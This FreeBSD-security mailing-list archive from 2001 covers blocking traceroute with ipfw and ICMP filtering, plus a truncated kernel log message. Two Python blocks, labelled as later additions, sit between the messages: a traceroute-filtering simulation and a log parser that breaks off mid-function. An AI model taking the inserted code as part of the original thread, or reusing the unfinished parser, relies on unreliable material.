disable traceroute to my host Date: Wed, 27 Jun 2001 14:35:04 -0400 MIME-Version: 1.0 Content-Type: text/plain; charset="Windows-1251" Content-Transfer-Encoding: 8bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org from someone earlier post.. i suggest to check this out http://www.isi.edu/in-notes/iana/assignments/icmp-parameters ----- Original Message ----- From: "3APA3A" <3APA3A@SECURITY.NNOV.RU> To: "Peter Jeremy" Cc: "alexus" ; Sent: Wednesday, June 27, 2001 3:43 AM Subject: Re[2]: disable traceroute to my host > Hello Peter, > > > > --Wednesday, June 27, 2001, 1:15:04 AM, you wrote to 3APA3A@SECURITY.NNOV.RU: > > PJ> On 2001-Jun-26 15:08:13 +0400, 3APA3A <3APA3A@SECURITY.NNOV.RU> wrote: > >>deny ICMP from (YOURNETWORK) to any icmptypes 0,3,11 out > >> > >>0 - to stop windows traceroute and ping > >>3 - to stop BSD-style traceroute > >>11 - to prevent intermediate router to reply traceroute > > PJ> Blocking ICMP type 3 will break Path-MTU discovery (which relies on > PJ> type 3 code 4). > > It's possible to combine - deny incoming UDP and outgoing ICMP types > 0, 11. > > In any case - there are thousand ways to discover route. Use NAT to > hide internal network. 
> > PJ> Peter > > PJ> To Unsubscribe: send mail to majordomo@FreeBSD.org > PJ> with "unsubscribe freebsd-security" in the body of the message > > > -- > ~/3APA3A > Âñåãäà áóäåì ðàäû ïîñëóøàòü âàøå ÷èðèêàíüå (Òâåí) > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 27 12: 2:37 2001 Delivered-To: freebsd-security@freebsd.org Received: from d170h113.resnet.uconn.edu (d170h113.resnet.uconn.edu [137.99.170.113]) by hub.freebsd.org (Postfix) with SMTP id 2BC0437B405 for ; Wed, 27 Jun 2001 12:02:31 -0700 (PDT) (envelope-from sirmoo@cowbert.2y.net) Received: (qmail 40296 invoked by uid 1001); 27 Jun 2001 19:05:15 -0000 Message-ID: <20010627190515.40295.qmail@d170h113.resnet.uconn.edu> References: <006a01c0fb6b$2d64d830$9865fea9@book> <771487721300.20010623150519@SECURITY.NNOV.RU> <009201c0fdad$57c2af00$9865fea9@book> <3181060651.20010626150813@SECURITY.NNOV.RU> <20010627071504.P95583@gsmx07.alcatel.com.au> <79255173079.20010627114324@SECURITY.NNOV.RU> <003701c0ff37$e229faa0$01000001@book> In-Reply-To: <003701c0ff37$e229faa0$01000001@book> From: "Peter C. Lai" To: "alexus" Cc: freebsd-security@FreeBSD.ORG Subject: Re: disable traceroute to my host Date: Wed, 27 Jun 2001 19:05:15 GMT Mime-Version: 1.0 Content-Type: text/plain; format=flowed; charset="iso-8859-1" Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org alexus writes: > from someone earlier post.. 
i suggest to check this out > > http://www.isi.edu/in-notes/iana/assignments/icmp-parameters > > ----- Original Message ----- > From: "3APA3A" <3APA3A@SECURITY.NNOV.RU> > To: "Peter Jeremy" > Cc: "alexus" ; > Sent: Wednesday, June 27, 2001 3:43 AM > Subject: Re[2]: disable traceroute to my host > > >> Hello Peter, >> >> >> >> --Wednesday, June 27, 2001, 1:15:04 AM, you wrote to > 3APA3A@SECURITY.NNOV.RU: >> >> PJ> On 2001-Jun-26 15:08:13 +0400, 3APA3A <3APA3A@SECURITY.NNOV.RU> wrote: >> >>deny ICMP from (YOURNETWORK) to any icmptypes 0,3,11 out >> >> >> >>0 - to stop windows traceroute and ping >> >>3 - to stop BSD-style traceroute >> >>11 - to prevent intermediate router to reply traceroute >> >> PJ> Blocking ICMP type 3 will break Path-MTU discovery (which relies on >> PJ> type 3 code 4). >> >> It's possible to combine - deny incoming UDP and outgoing ICMP types >> 0, 11. >> >> In any case - there are thousand ways to discover route. Use NAT to >> hide internal network. >> >> PJ> Peter >> >> PJ> To Unsubscribe: send mail to majordomo@FreeBSD.org >> PJ> with "unsubscribe freebsd-security" in the body of the message >> >> >> -- >> ~/3APA3A >> Âñåãäà áóäåì ðàäû ïîñëóøàòü âàøå ÷èðèêàíüå (Òâåí) >> >> >> >> To Unsubscribe: send mail to majordomo@FreeBSD.org >> with "unsubscribe freebsd-security" in the body of the message >> > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message There's no significant reason to block traceroute (and ICMP types). First, it doesn't improve your "security" (well maybe your false sense of security). Second, blocking ICMP types breaks the RFC(s), which means that in some cases, routing breaks etc. This has been discussed in length on the list before; you can read it yourself. Third, please try to read all the mail in a thread before posting 11 times to 11 messages in a row. ----------- Peter C. Lai University of Connecticut Dept. of Residential Life | Programmer Dept. 
of Molecular and Cell Biology | Undergraduate Research Assistant/Honors Program http://cowbert.2y.net/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 27 12:17:17 2001 Delivered-To: freebsd-security@freebsd.org Received: from db.nexgen.com (db.nexgen.com [64.81.208.78]) by hub.freebsd.org (Postfix) with SMTP id A408637B401 for ; Wed, 27 Jun 2001 12:17:08 -0700 (PDT) (envelope-from ml@db.nexgen.com) Received: (qmail 82049 invoked from network); 27 Jun 2001 19:18:03 -0000 Received: from localhost.nexgen.com (HELO book) (root@127.0.0.1) by localhost.nexgen.com with SMTP; 27 Jun 2001 19:18:03 -0000 Message-ID: <001101c0ff3d$ca013aa0$01000001@book> From: "alexus" To: "Ryan Masse" Cc: References: <006a01c0fb6b$2d64d830$9865fea9@book> <3B36267B.5B5FDBE@inforta.com> <20010625093731.A934@ringworld.oblivion.bg> <01ec01c0fdb1$6c9cada0$9865fea9@book> <20010626085804.E780@ringworld.oblivion.bg> <002701c0fe76$7530eab0$01000001@book> <003401c0fe93$a3f405e0$3200a8c0@Home> Subject: Re: disable traceroute to my host Date: Wed, 27 Jun 2001 15:17:21 -0400 MIME-Version: 1.0 Content-Type: text/plain; charset="Windows-1252" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org sounds good.. although what is tcp there for? ----- Original Message ----- From: "Ryan Masse" To: "alexus" Cc: Sent: Tuesday, June 26, 2001 6:59 PM Subject: Re: disable traceroute to my host > did u get my post about blackhole? 
> > man blackhole > > In the UDP instance, enabling blackhole behaviour turns off the sending > of an ICMP port unreachable message in response to a UDP datagram which > arrives on a port where there is no socket listening. It must be noted > that this behaviour will prevent remote systems from running > traceroute(8) to your system. > > > The following would enable the use of backhole of your system; > sysctl -w net.inet.tcp.blackhole=2 > sysctl -w net.inet.udp.blackhole=1 > > The above would block *nix traceroutes using the udp method. Simply use ipfw > icmptype to block all MS attempts > > Ryan > > > > someone else using ttl=1? that's sux.. oh well i guess its imposible to > > disable it.. cuz i dont want to block something that should work.. > > > > thanks everyone > > > > ----- Original Message ----- > > From: "Peter Pentchev" > > To: "alexus" > > Cc: "Simon Rakovec" ; > > Sent: Tuesday, June 26, 2001 1:58 AM > > Subject: Re: disable traceroute to my host > > > > > > > On Mon, Jun 25, 2001 at 04:00:03PM -0400, alexus wrote: > > > > i agree this is not a solution.. looks like tty=1 is best solution so > > far > > > > > > TTL=1 is not a general solution, because it only blocks traceroutes to > > this > > > particular host, not to any machines that it is acting as a gateway for. > > > > > > Moreover, TTL=1 is not a real-world solution, because some *legitimate* > > > packets might arrive with TTL=1 (yes, there are some OS's that set too > > > low TTL's on outgoing packets, and there are some global backbone ISP's > > > which have a *lot* of routers, so it is possible that a normal packet > > > destined for your host should reach you with TTL=1). > > > > > > And just btw.. Really, why do you want to block traceroutes? > > > > > > G'luck, > > > Peter > > > > > > -- > > > because I didn't think of a good beginning of it. 
> > > > > > > ----- Original Message ----- > > > > From: "Peter Pentchev" > > > > To: "Simon Rakovec" > > > > Cc: > > > > Sent: Monday, June 25, 2001 2:37 AM > > > > Subject: Re: disable traceroute to my host > > > > > > > > > > > > > On Sun, Jun 24, 2001 at 07:42:19PM +0200, Simon Rakovec wrote: > > > > > > Try this: > > > > > > > > > > > > ipfw add deny udp from any 32769-65535 to 33434-33523 > > > > > > > > > > As Karsten noted in a followup, this is not proper network practice. > > > > > There might be a LOT of things listening on those UDP ports, > including > > > > > ephemeral outgoing UDP connections. > > > > > > > > > > As many other people noted, this does not stop Windows traceroute, > > > > > which goes via ICMP. > > > > > > > > > > As the traceroute(8) manpage notes, this does not stop people who > > > > > know how to use the traceroute '-p port' option to select a starting > > > > > port != 32768. > > > > > > > > > > As Dag-Erling Smoerdgrav noted, in general it is impossible to > disable > > > > > a person determined to traceroute you, and in practice, there is > > > > > no need to. > > > > > > > > > > G'luck, > > > > > Peter > > > > > > > > > > PS. How was that now... one source: plagiarism, two sources: > > comparative > > > > > study, three sources: an academic thesis.. I did even better than > > that! > > > > ;) > > > > > > > > > > -- > > > > > Thit sentence is not self-referential because "thit" is not a word. > > > > > > > > > > > alexus wrote: > > > > > > > > > > > > > > is it possible to disable using ipfw so people won't be able to > > > > traceroute > > > > > > > me? 
> > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 27 22:17:38 2001 Delivered-To: freebsd-security@freebsd.org Received: from hawk.mail.pas.earthlink.net (hawk.mail.pas.earthlink.net [207.217.120.22]) by hub.freebsd.org (Postfix) with ESMTP id 151BA37B407 for ; Wed, 27 Jun 2001 22:17:35 -0700 (PDT) (envelope-from cjc@earthlink.net) Received: from blossom.cjclark.org (dialup-209.244.106.34.Dial1.SanJose1.Level3.net [209.244.106.34]) by hawk.mail.pas.earthlink.net (EL-8_9_3_3/8.9.3) with ESMTP id WAA16697; Wed, 27 Jun 2001 22:17:23 -0700 (PDT) Received: (from cjc@localhost) by blossom.cjclark.org (8.11.4/8.11.3) id f5S5Fha00910; Wed, 27 Jun 2001 22:15:43 -0700 (PDT) (envelope-from cjc) Date: Wed, 27 Jun 2001 22:15:43 -0700 From: "Crist J. 
Clark" To: alexus Cc: Ryan Masse , freebsd-security@FreeBSD.ORG Subject: Re: disable traceroute to my host Message-ID: <20010627221543.A346@blossom.cjclark.org> Reply-To: cjclark@alum.mit.edu References: <006a01c0fb6b$2d64d830$9865fea9@book> <3B36267B.5B5FDBE@inforta.com> <20010625093731.A934@ringworld.oblivion.bg> <01ec01c0fdb1$6c9cada0$9865fea9@book> <20010626085804.E780@ringworld.oblivion.bg> <002701c0fe76$7530eab0$01000001@book> <003401c0fe93$a3f405e0$3200a8c0@Home> <001101c0ff3d$ca013aa0$01000001@book> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <001101c0ff3d$ca013aa0$01000001@book>; from ml@db.nexgen.com on Wed, Jun 27, 2001 at 03:17:21PM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Wed, Jun 27, 2001 at 03:17:21PM -0400, alexus wrote: > sounds good.. although what is tcp there for? You can traceroute with any protocol. TCP is just as easy as UDP. As people keep saying over and over, there really is no way to stop traceroutes without severely breaking things. If you really want to stop traceroutes, pull the plug. Can this thread die now? -- Crist J. Clark cjclark@alum.mit.edu To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 27 23:29:55 2001 Delivered-To: freebsd-security@freebsd.org Received: from roulen-gw.morning.ru (roulen-gw.morning.ru [195.161.98.242]) by hub.freebsd.org (Postfix) with ESMTP id B24F737B401 for ; Wed, 27 Jun 2001 23:29:51 -0700 (PDT) (envelope-from poige@morning.ru) Received: from NIC1 (seven.ld [192.168.11.7]) by roulen-gw.morning.ru (Postfix) with ESMTP id E1BE118; Thu, 28 Jun 2001 14:29:49 +0800 (KRAST) Date: Thu, 28 Jun 2001 14:30:21 +0700 From: Igor Podlesny X-Mailer: The Bat! 
(v1.52 Beta/7) UNREG / CD5BF9353B3B7091 Organization: Morning Network X-Priority: 3 (Normal) Message-ID: <198504028264.20010628143021@morning.ru> To: "Crist J. Clark" Cc: freebsd-security@FreeBSD.ORG Subject: Re[2]: disable traceroute to my host In-Reply-To: <20010627221543.A346@blossom.cjclark.org> References: <006a01c0fb6b$2d64d830$9865fea9@book> <3B36267B.5B5FDBE@inforta.com> <20010625093731.A934@ringworld.oblivion.bg> <01ec01c0fdb1$6c9cada0$9865fea9@book> <20010626085804.E780@ringworld.oblivion.bg> <002701c0fe76$7530eab0$01000001@book> <003401c0fe93$a3f405e0$3200a8c0@Home> <001101c0ff3d$ca013aa0$01000001@book> <20010627221543.A346@blossom.cjclark.org> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > On Wed, Jun 27, 2001 at 03:17:21PM -0400, alexus wrote: >> sounds good.. although what is tcp there for? > You can traceroute with any protocol. TCP is just as easy as UDP. > As people keep saying over and over, there really is no way to stop > traceroutes without severely breaking things. I disagree. cause don't see any real hurt of disallowing icmp-echo-reply (0), icmp-unreach.icmp-unreach-port (3.3) and icmp-timxceed (11). the first is already in relatively common practice the second is similar to blackhole BSD's feature (yeah... it doesn't fit RFC, but the cruel world ;) the third is just an informative message (like the second isn't RFC-compilant but partially) In sum we can just complain bout non RFC-behavior.... but at the other side we're to understand that playing according to the rules is too expensive while others don't bother with. Already mentioned stealth routing (ok, forwarding, if the difference kick in eye ;) isn't RFC-compilant and what? "...Who ever promised anybody equal share?..." 
> If you really want to stop traceroutes, pull the plug.

extreme? ;)

> Can this thread
> die now?

18  * * *
19  * * *
20  * * *
21  * * *
^C

p.s. ;)))

--
Igor
mailto:poige@morning.ru

From owner-freebsd-security Thu Jun 28 1: 6:39 2001
Delivered-To: freebsd-security@freebsd.org
Received: from ringworld.nanolink.com (ringworld.nanolink.com [195.24.48.13]) by hub.freebsd.org (Postfix) with SMTP id 2944737B403 for ; Thu, 28 Jun 2001 01:06:35 -0700 (PDT) (envelope-from roam@orbitel.bg)
Received: (qmail 80855 invoked by uid 1000); 28 Jun 2001 08:11:20 -0000
Date: Thu, 28 Jun 2001 11:11:20 +0300
From: Peter Pentchev
To: Igor Podlesny
Cc: "Crist J. Clark" , freebsd-security@FreeBSD.ORG
Subject: Re: disable traceroute to my host
Message-ID: <20010628111119.C80342@ringworld.oblivion.bg>
Mail-Followup-To: Igor Podlesny , "Crist J. Clark" , freebsd-security@FreeBSD.ORG
References: <006a01c0fb6b$2d64d830$9865fea9@book> <3B36267B.5B5FDBE@inforta.com> <20010625093731.A934@ringworld.oblivion.bg> <01ec01c0fdb1$6c9cada0$9865fea9@book> <20010626085804.E780@ringworld.oblivion.bg> <002701c0fe76$7530eab0$01000001@book> <003401c0fe93$a3f405e0$3200a8c0@Home> <001101c0ff3d$ca013aa0$01000001@book> <20010627221543.A346@blossom.cjclark.org> <198504028264.20010628143021@morning.ru>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <198504028264.20010628143021@morning.ru>; from poige@morning.ru on Thu, Jun 28, 2001 at 02:30:21PM +0700
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk

On Thu, Jun 28, 2001 at 02:30:21PM +0700, Igor Podlesny wrote:
>
> > On Wed, Jun 27, 2001 at 03:17:21PM -0400, alexus wrote:
> >> sounds good.. although what is tcp there for?
> > You can traceroute with any protocol. TCP is just as easy as UDP.
>
> > As people keep saying over and over, there really is no way to stop
> > traceroutes without severely breaking things.
>
> I disagree. cause don't see any real hurt of disallowing
> icmp-echo-reply (0), icmp-unreach.icmp-unreach-port (3.3) and
> icmp-timxceed (11).
>
> the first is already in relatively common practice

This is acceptable, although it might confuse somebody who's new to the hostile world of today's Internet :)

> the second is similar to blackhole BSD's feature (yeah... it doesn't
> fit RFC, but the cruel world ;)

..and if you are running a UDP service, it would confuse the hell out of people unable to connect to it when the server is down.

> the third is just an informative message (like the second isn't
> RFC-compliant but partially)

..an informative message that can tell somebody exactly why they can't connect to your system, instead of having their connections just hang. As I mentioned before, there *are* OSes which will set stupidly low TTLs on outgoing packets.

G'luck,
Peter

--
This sentence would be seven words long if it were six words shorter.

From owner-freebsd-security Thu Jun 28 1:49:24 2001
Delivered-To: freebsd-security@freebsd.org
Received: from roulen-gw.morning.ru (roulen-gw.morning.ru [195.161.98.242]) by hub.freebsd.org (Postfix) with ESMTP id E753E37B403 for ; Thu, 28 Jun 2001 01:49:21 -0700 (PDT) (envelope-from poige@morning.ru)
Received: from NIC1 (seven.ld [192.168.11.7]) by roulen-gw.morning.ru (Postfix) with ESMTP id 0B5E12D; Thu, 28 Jun 2001 16:49:20 +0800 (KRAST)
Date: Thu, 28 Jun 2001 16:49:52 +0700
From: Igor Podlesny
X-Mailer: The Bat!
(v1.52 Beta/7) UNREG / CD5BF9353B3B7091 Organization: Morning Network X-Priority: 3 (Normal) Message-ID: <65512399821.20010628164952@morning.ru> To: Peter Pentchev Cc: freebsd-security@FreeBSD.ORG Subject: Re[2]: disable traceroute to my host In-Reply-To: <20010628111119.C80342@ringworld.oblivion.bg> References: <006a01c0fb6b$2d64d830$9865fea9@book> <3B36267B.5B5FDBE@inforta.com> <20010625093731.A934@ringworld.oblivion.bg> <01ec01c0fdb1$6c9cada0$9865fea9@book> <20010626085804.E780@ringworld.oblivion.bg> <002701c0fe76$7530eab0$01000001@book> <003401c0fe93$a3f405e0$3200a8c0@Home> <001101c0ff3d$ca013aa0$01000001@book> <20010627221543.A346@blossom.cjclark.org> <198504028264.20010628143021@morning.ru> <20010628111119.C80342@ringworld.oblivion.bg> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > This is acceptable, although and this is the point where everybody makes the choice ;) (I'd like to underline that the original question wasn't "is it worth doing", right?) 
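The following is an added example, not part of any message in this thread, that models the filtering choices argued over above. It simulates a traceroute along a constructed path (router and host names, ports and filter sets are all made up) to show what each ICMP block actually hides: dropping echo-reply and port-unreachable on the target turns the final hop into `* * *` while every router before it still answers, dropping time-exceeded on an end host changes nothing because packets addressed to it never expire there, and a TCP probe to a port the host serves is answered by the TCP stack itself, which no ICMP filter touches.

```python
"""Added example (not from the thread): a model of what a traceroute sees
when the target host filters the ICMP replies named above (echo-reply,
port-unreachable, time-exceeded) and of why a TCP probe to an open port
cannot be hidden that way.  Hosts, paths and port numbers are constructed
for illustration."""
from dataclasses import dataclass, field

TRACEROUTE_UDP_BASE_PORT = 33434  # classic traceroute(8) default


@dataclass
class Host:
    name: str
    # ICMP messages this host refuses to send: any of
    # "echo-reply", "port-unreach", "time-exceeded"
    icmp_filter: set = field(default_factory=set)
    open_tcp_ports: set = field(default_factory=set)
    # drop TCP SYNs to closed ports instead of answering with RST
    tcp_stealth: bool = False


def probe_reply(path, ttl, proto, dport):
    """Who answers one probe sent with this TTL along `path`?

    `path` lists the routers in order with the target host last.
    Returns the replying host's name or None for a timeout ('*')."""
    if ttl <= len(path) - 1:
        # The TTL expires on an intermediate router.  Only that router's
        # own time-exceeded policy matters; the target's does not.
        router = path[ttl - 1]
        return None if "time-exceeded" in router.icmp_filter else router.name
    target = path[-1]
    if proto == "udp":
        # UDP to an unused high port: reply is ICMP port-unreachable (3.3)
        return None if "port-unreach" in target.icmp_filter else target.name
    if proto == "icmp":
        return None if "echo-reply" in target.icmp_filter else target.name
    if proto == "tcp":
        # A SYN is answered with SYN/ACK (open) or RST (closed); neither
        # is ICMP, so the ICMP filter has no effect.  Only a packet filter
        # that drops SYNs to closed ports can hide the host, and then only
        # on ports it does not serve.
        if dport in target.open_tcp_ports or not target.tcp_stealth:
            return target.name
        return None
    raise ValueError(f"unknown probe protocol {proto!r}")


def traceroute(path, proto="udp", dport=TRACEROUTE_UDP_BASE_PORT, max_hops=30):
    """Return [(ttl, name_or_star), ...]; stops once the target answers,
    otherwise runs to max_hops exactly like a real trace printing '* * *'."""
    hops = []
    for ttl in range(1, max_hops + 1):
        who = probe_reply(path, ttl, proto, dport)
        hops.append((ttl, who or "*"))
        if who == path[-1].name:
            break
    return hops


def render(hops):
    """Format like traceroute(8) output (three probes per hop)."""
    return [f"{ttl:2d}  " + ("* * *" if who == "*" else who) for ttl, who in hops]


if __name__ == "__main__":
    # Constructed path: two routers, then a host that filters all three
    # ICMP types from the thread, serves only TCP/80 and drops other SYNs.
    path = [
        Host("r1.example"),
        Host("r2.example"),
        Host("target.example",
             icmp_filter={"echo-reply", "port-unreach", "time-exceeded"},
             open_tcp_ports={80}, tcp_stealth=True),
    ]
    for proto, port in (("udp", TRACEROUTE_UDP_BASE_PORT), ("icmp", 0),
                        ("tcp", 25), ("tcp", 80)):
        print(f"--- {proto} probes to port {port}")
        print("\n".join(render(traceroute(path, proto, port, max_hops=6))))
```

Run it and the UDP and ICMP traces end in the same run of `* * *` lines Igor pasted, with the two routers named on hops 1 and 2; the TCP probe to port 80 names the host on hop 3, so anyone who knows which service the box runs still finds it.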
-- Igor mailto:poige@morning.ru To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 28 6:40:24 2001 Delivered-To: freebsd-security@freebsd.org Received: from ns2.sysadmin-inc.com (ns2.sysadmin-inc.com [209.16.228.145]) by hub.freebsd.org (Postfix) with SMTP id E284F37B403 for ; Thu, 28 Jun 2001 06:40:20 -0700 (PDT) (envelope-from peter@sysadmin-inc.com) Received: (qmail 89185 invoked by alias); 28 Jun 2001 13:40:20 -0000 Received: from unknown (HELO 98wkst) (10.10.1.70) by ns2.sysadmin-inc.com with SMTP; 28 Jun 2001 13:40:20 -0000 From: "Peter Brezny" To: Subject: security check output, kernel log message Date: Thu, 28 Jun 2001 09:39:34 -0400 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0) X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Importance: Normal Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I received this kernel log message this morning > 5.255.255:137 in via xl1 What does this mean? Peter Brezny SysAdmin Services Inc. 
To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 28 6:44:56 2001 Delivered-To: freebsd-security@freebsd.org Received: from kawoserv.kawo2.rwth-aachen.de (kawoserv.kawo2.RWTH-Aachen.DE [134.130.180.1]) by hub.freebsd.org (Postfix) with ESMTP id 1EADC37B406 for ; Thu, 28 Jun 2001 06:44:52 -0700 (PDT) (envelope-from alex@fump.kawo2.rwth-aachen.de) Received: from fump.kawo2.rwth-aachen.de (root@fump.kawo2.rwth-aachen.de [134.130.181.148]) by kawoserv.kawo2.rwth-aachen.de (8.9.3/8.9.3) with ESMTP id PAA10728; Thu, 28 Jun 2001 15:44:50 +0200 Received: (from alex@localhost) by fump.kawo2.rwth-aachen.de (8.11.3/8.11.3) id f5SDjUE96354; Thu, 28 Jun 2001 15:45:30 +0200 (CEST) (envelope-from alex) Date: Thu, 28 Jun 2001 15:45:29 +0200 From: Alexander Langer To: Peter Brezny Cc: freebsd-security@FreeBSD.ORG Subject: Re: security check output, kernel log message Message-ID: <20010628154529.A96323@fump.kawo2.rwth-aachen.de> References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from peter@sysadmin-inc.com on Thu, Jun 28, 2001 at 09:39:34AM -0400 X-PGP-Fingerprint: 44 28 CA 4C 46 5B D3 A8 A8 E3 BA F3 4E 60 7D 7F X-PGP-at: finger alex@big.endian.de X-Verwirrung: Dieser Header dient der allgemeinen Verwirrung. Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Thus spake Peter Brezny (peter@sysadmin-inc.com): > > 5.255.255:137 in via xl1 > What does this mean? That is a truncated log from another day. 
Alex To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 28 8: 8:57 2001 Delivered-To: freebsd-security@freebsd.org Received: from axl.seasidesoftware.co.za (axl.seasidesoftware.co.za [196.31.7.201]) by hub.freebsd.org (Postfix) with ESMTP id DDEA137B405 for ; Thu, 28 Jun 2001 08:08:48 -0700 (PDT) (envelope-from sheldonh@starjuice.net) Received: from sheldonh (helo=axl.seasidesoftware.co.za) by axl.seasidesoftware.co.za with local-esmtp (Exim 3.30 #1) id 15FdMj-0000NJ-00; Thu, 28 Jun 2001 17:05:57 +0200 From: Sheldon Hearn To: Alexander Langer Cc: Peter Brezny , freebsd-security@FreeBSD.ORG Subject: Re: security check output, kernel log message In-reply-to: Your message of "Thu, 28 Jun 2001 15:45:29 +0200." <20010628154529.A96323@fump.kawo2.rwth-aachen.de> Date: Thu, 28 Jun 2001 17:05:57 +0200 Message-ID: <1444.993740757@axl.seasidesoftware.co.za> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Thu, 28 Jun 2001 15:45:29 +0200, Alexander Langer wrote: > > > 5.255.255:137 in via xl1 > > What does this mean? > > That is a truncated log from another day. What I've wondered for a while is how to flush that out so I stop getting it in my daily security check output. I still have a load of 'em left over from when I turned log_in_vain on a few weeks ago. Ciao, Sheldon. 
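As an added example (not from the thread and not part of FreeBSD): the kernel messages the daily security check reports come out of a fixed-size ring buffer, so the oldest surviving line is usually cut off mid-record, which is the kind of fragment `5.255.255:137 in via xl1` is. The parser below reads a constructed dmesg excerpt, separates complete records from truncated heads so the latter can be dropped from the report, and counts hits per destination port. It assumes two line formats: the ipfw(8) `ipfw: <rule> Deny <proto> <src> <dst> in via <if>` form (which is what the fragment's tail matches) and the `Connection attempt to <proto> <dst> from <src>` form printed by the log_in_vain sysctls.

```python
"""Added example (not from the thread): parse the kernel messages the daily
security check pulls out of the dmesg ring buffer, separate complete
ipfw/log_in_vain records from the truncated fragment left when the ring
buffer wraps, and summarise the rest by destination port.  The two line
formats are assumed from ipfw(8) and the tcp/udp log_in_vain sysctls of
the era; the sample buffer is constructed."""
import re
from collections import Counter

# ipfw: <rule> <Action> <PROTO> <src>[:<sport>] <dst>[:<dport>] in|out via <iface>
IPFW_RE = re.compile(
    r"^ipfw: (?P<rule>\d+) (?P<action>\w+) (?P<proto>[\w:.]+) "
    r"(?P<src>\d+(?:\.\d+){3})(?::(?P<sport>\d+))? "
    r"(?P<dst>\d+(?:\.\d+){3})(?::(?P<dport>\d+))? "
    r"(?P<dir>in|out) via (?P<iface>\w+)$")
# Connection attempt to TCP <dst>:<dport> from <src>:<sport>
VAIN_RE = re.compile(
    r"^Connection attempt to (?P<proto>TCP|UDP) "
    r"(?P<dst>\d+(?:\.\d+){3}):(?P<dport>\d+) from "
    r"(?P<src>\d+(?:\.\d+){3}):(?P<sport>\d+)$")
# The tail end of either record: what survives when the ring buffer has
# overwritten the beginning of the line.
TAIL_RE = re.compile(r"(?:\b(?:in|out) via \w+|\bfrom \d+(?:\.\d+){3}:\d+)$")


def parse_kernel_log(text):
    """Return (records, truncated, other).  Each record is a dict with at
    least source, proto, src, dst and dport."""
    records, truncated, other = [], [], []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        m = IPFW_RE.match(line)
        if m:
            records.append({"source": "ipfw", "rule": int(m["rule"]),
                            "action": m["action"], "proto": m["proto"],
                            "src": m["src"], "dst": m["dst"],
                            "dport": int(m["dport"]) if m["dport"] else None,
                            "iface": m["iface"]})
            continue
        m = VAIN_RE.match(line)
        if m:
            records.append({"source": "log_in_vain", "proto": m["proto"],
                            "src": m["src"], "dst": m["dst"],
                            "dport": int(m["dport"])})
            continue
        # Not a full record: a recognisable tail means the head was lost
        # to the ring buffer; anything else is an unrelated kernel message.
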